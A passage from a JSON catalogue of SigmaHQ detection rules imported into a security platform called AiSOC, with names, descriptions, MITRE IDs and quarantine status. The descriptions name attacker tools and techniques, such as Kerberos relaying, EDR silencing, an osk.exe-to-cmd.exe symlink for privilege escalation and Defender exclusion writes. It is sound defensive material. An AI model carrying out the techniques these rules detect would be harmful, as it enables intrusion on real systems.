"e8ebd53a-30c2-45bd-81bb-74befba07bdb", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml" } }, { "id": "sigmahq-sigma-e9142d84-fbe0-401d-ac50-3e519fb00c89", "type": "detection", "name": "WhoAmI as Parameter", "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-as-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" } }, { "id": "sigmahq-sigma-e92a4287-e072-4a40-9739-370c106bb750", "type": "detection", "name": "HackTool - SOAPHound Execution", "description": "Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-soaphound-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e92a4287-e072-4a40-9739-370c106bb750", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml" } }, { "id": "sigmahq-sigma-e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "type": "detection", "name": "UEFI Persistence Via Wpbbin - FileCreation", "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory, which could be indicative of a UEFI-based persistence method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1542.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uefi-persistence-via-wpbbin-filecreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" } }, { "id": "sigmahq-sigma-e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "type": "detection", "name": "HackTool - KrbRelay Execution", "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/hacktool-krbrelay-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml" } }, { "id": "sigmahq-sigma-e97d9903-53b2-41fc-8cb9-889ed4093e80", "type": "detection", "name": "KrbRelayUp Service Installation", "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/krbrelayup-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml" } }, { "id": "sigmahq-sigma-e9856028-fd4e-46e6-b3d1-10f7ceb95078", "type": "detection", "name": "OpenCanary - SNMP OID Request", "description": "Detects instances where an SNMP service on an OpenCanary node has had an OID request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1016", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-snmp-oid-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9856028-fd4e-46e6-b3d1-10f7ceb95078", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_snmp_cmd.yml" } }, { "id": "sigmahq-sigma-e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "type": "detection", "name": "Apache Threading Error", "description": "Detects an issue in apache logs that reports threading related errors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/apache-threading-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/product/apache/web_apache_threading_error.yml" } }, { "id": "sigmahq-sigma-e9b61244-893f-427c-b287-3e708f321c6b", "type": "detection", "name": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-using-symlink-between-osk-and-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9b61244-893f-427c-b287-3e708f321c6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml" } }, { "id": "sigmahq-sigma-e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", "type": "detection", "name": "Windows Defender Exclusion Registry Key - Write Access Requested", "description": "Detects write access requests to the Windows Defender exclusions registry keys. 
This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusion-registry-key-write-access-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml" } }, { "id": "sigmahq-sigma-e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "type": "detection", "name": "NTLMv1 Logon Between Client and Server", "description": "Detects the reporting of NTLMv1 being used between a client and server. 
NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntlmv1-logon-between-client-and-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml" } }, { "id": "sigmahq-sigma-e9edd087-89d8-48c9-b0b4-5b9bb10896b8", "type": "detection", "name": "Potential SpEL Injection In Spring Framework", "description": "Detects potential SpEL Injection exploitation, which may lead to RCE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-spel-injection-in-spring-framework.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9edd087-89d8-48c9-b0b4-5b9bb10896b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/spring/spring_spel_injection.yml" } }, { "id": "sigmahq-sigma-e9f55347-2928-4c06-88e5-1a7f8169942e", 
"type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9f55347-2928-4c06-88e5-1a7f8169942e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml" } }, { "id": "sigmahq-sigma-e9f8f8cc-07cc-4e81-b724-f387db9175e4", "type": "detection", "name": "Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension", "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-of-regasm-regsvcs-with-uncommon-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9f8f8cc-07cc-4e81-b724-f387db9175e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml" } }, { "id": "sigmahq-sigma-e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "type": "detection", "name": "VSSAudit Security Event Source Registration", "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vssaudit-security-event-source-registration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" } }, { "id": "sigmahq-sigma-ea011323-7045-460b-b2d7-0f7442ea6b38", "type": "detection", "name": "Potential PsExec Remote Execution", "description": "Detects potential psexec commands that initiate execution on remote systems via common command-line flags used by the utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-psexec-remote-execution.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml" } }, { "id": "sigmahq-sigma-ea0cdc3e-2239-4f26-a947-4e8f8224e464", "type": "detection", "name": "Suspicious File Encoded To Base64 Via Certutil.EXE", "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the extension of the file is suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-encoded-to-base64-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea0cdc3e-2239-4f26-a947-4e8f8224e464", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml" } }, { "id": "sigmahq-sigma-ea34fb97-e2c4-4afb-810f-785e4459b194", "type": "detection", "name": "Curl Usage on Linux", "description": "Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/curl-usage-on-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea34fb97-e2c4-4afb-810f-785e4459b194", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" } }, { "id": "sigmahq-sigma-ea3ecad2-db86-4a89-ad0b-132a10d2db55", "type": "detection", "name": "Interactive Bash Suspicious Children", "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/interactive-bash-suspicious-children.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" } }, { "id": "sigmahq-sigma-ea5c131b-380d-49f9-aeb3-920694da4d4b", "type": "detection", "name": "Suspicious Unsigned Thor Scanner Execution", "description": "Detects loading and execution of an unsigned thor scanner binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"endpoint", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/suspicious-unsigned-thor-scanner-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea5c131b-380d-49f9-aeb3-920694da4d4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_thor_unsigned_execution.yml" } }, { "id": "sigmahq-sigma-ea61bb82-a5e0-42e6-8537-91d29500f1b9", "type": "detection", "name": "Potential Abuse of Linux Magic System Request Key", "description": "Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges\nto silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes,\nor disrupt forensic analysis\u2014all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be\nmisused as a stealthy post-exploitation tool. 
It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1529", "T1489", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-abuse-of-linux-magic-system-request-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea61bb82-a5e0-42e6-8537-91d29500f1b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_magic_system_request_key.yml" } }, { "id": "sigmahq-sigma-ea9bf0fa-edec-4fb8-8b78-b119f2528186", "type": "detection", "name": "Windows Defender AMSI Trigger Detected", "description": "Detects triggering of AMSI by Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-amsi-trigger-detected.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml" } }, { "id": "sigmahq-sigma-eaa9ac35-1730-441f-9587-25767bde99d7", "type": "detection", "name": "Github Outside Collaborator Detected", "description": "Detects when an 
organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001", "T1098.003", "T1213.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-outside-collaborator-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eaa9ac35-1730-441f-9587-25767bde99d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_outside_collaborator_detected.yml" } }, { "id": "sigmahq-sigma-eae8c0c8-e5da-450a-9d7d-66aa56cd26b6", "type": "detection", "name": "OpenCanary - NMAP FIN Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP FIN Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-fin-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eae8c0c8-e5da-450a-9d7d-66aa56cd26b6", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_fin_scan.yml" } }, { "id": "sigmahq-sigma-eae8ce9f-bde9-47a6-8e79-f20d18419910", "type": "detection", "name": "Suspicious History File Operations - Linux", "description": "Detects commandline operations on shell history files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-history-file-operations-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eae8ce9f-bde9-47a6-8e79-f20d18419910", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_susp_histfile_operations.yml" } }, { "id": "sigmahq-sigma-eafe6f2b-cfec-4612-aec2-49563c33a087", "type": "detection", "name": "Google Workspace Government Attack Warning", "description": "Detects a login attempt in Google Workspace flagged as a potential attack by a government-backed threat actor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-government-attack-warning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "eafe6f2b-cfec-4612-aec2-49563c33a087", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/login/gcp_gworkspace_govattack.yml" } }, { "id": "sigmahq-sigma-eb1c4225-1c23-4241-8dd4-051389fde4ce", "type": "detection", "name": "Suspicious DumpMinitool Execution", "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dumpminitool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml" } }, { "id": "sigmahq-sigma-eb2d07d4-49cb-4523-801a-da002df36602", "type": "detection", "name": "HackTool - EDRSilencer Execution", "description": "Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/hacktool-edrsilencer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb2d07d4-49cb-4523-801a-da002df36602", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml" } }, { "id": "sigmahq-sigma-eb2fd349-ec67-4caa-9143-d79c7fb34441", "type": "detection", "name": "Suspicious GPO Discovery With Get-GPO", "description": "Detects use of Get-GPO to get one GPO or all the GPOs in a domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1615" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-gpo-discovery-with-get-gpo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" } }, { "id": "sigmahq-sigma-eb6c2004-1cef-427f-8885-9042974e5eb6", "type": "detection", "name": "Suspicious Network Communication With IPFS", "description": "Detects connections to the InterPlanetary File System (IPFS) that contain a user's email address, which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": 
"low", "category": "_quarantine", "mitre_techniques": [ "T1056" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-communication-with-ipfs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eb6c2004-1cef-427f-8885-9042974e5eb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" } }, { "id": "sigmahq-sigma-ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "type": "detection", "name": "User Added to an Administrator's Azure AD Role", "description": "User Added to an Administrator's Azure AD Role", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-an-administrator-s-azure-ad-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml" } }, { "id": "sigmahq-sigma-ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - PowerShell Module", "description": "Detects obfuscated PowerShell via use of Clip.exe in scripts", "version": "1.0.0", 
